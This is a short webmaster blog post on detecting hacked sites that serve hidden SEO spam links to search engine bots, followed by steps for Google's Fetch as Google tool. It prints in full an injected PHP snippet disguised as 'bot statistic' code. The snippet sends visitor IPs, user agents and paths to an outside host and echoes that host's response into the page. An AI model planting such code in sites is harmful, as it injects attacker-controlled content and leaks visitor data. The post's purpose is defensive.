How to debug hacked sites with Google

Today, alot of hacker to hack your site and place his links for SEO,

This code will add his URLs when search engine bots come, cant see it when you debugging your site.(doesn’t appear to normal users, but only to Search Engine Bots)
Google allow you to debug hacked site with The Fetch as Google tool lets you see a page as Google sees it. This is particularly useful if you’re troubleshooting a page’s poor performance in search results.

 

php code like that:
<?php  
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
$sReferer = '';
if(isset($_SERVER['HTTP_REFERER']) === true)
{
$sReferer = strtolower($_SERVER['HTTP_REFERER']);
}
$stCurlHandle = NULL;
if(!(strpos($sUserAgent, 'google') === false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create  bot analitics        
$stCurlHandle = curl_init('http://xxxxx.net/Stat/StatJ/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer));
} else
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create  bot analitics        
$stCurlHandle = curl_init('http://xxxxx.net/Stat/StatJ/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer));
}
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = curl_exec($stCurlHandle);
curl_close($stCurlHandle);
echo $sResult; // Statistic code end
?>

How to check it?

1. Login to your google webmaster tool http://google.com/webmasters/ On the Webmaster Tools Home page, click the site you want.
2. On the Dashboard, under Health, click Fetch as Google.
3. In the text box, type the path to the page you want to check. example: http://www.joomquery.com
4. In the dropdown list, select the type of fetch you want. To see what our web crawler Googlebot sees, select Web. To see what our mobile crawler Googlebot-Mobile sees, select cHTML (this is used mainly for Japanese web sites) or Mobile XHTML/WML.
5. Click Fetch.

You can use this tool to fetch up to 500 URLs a week per Webmaster Tools account.

Note: Fetch as Google is designed to help webmasters troubleshoot potential issues with the crawling of their site. While the tool reflects what Google sees, there may be some differences. For example, Fetch as Google does not follow redirects.

Leave a comment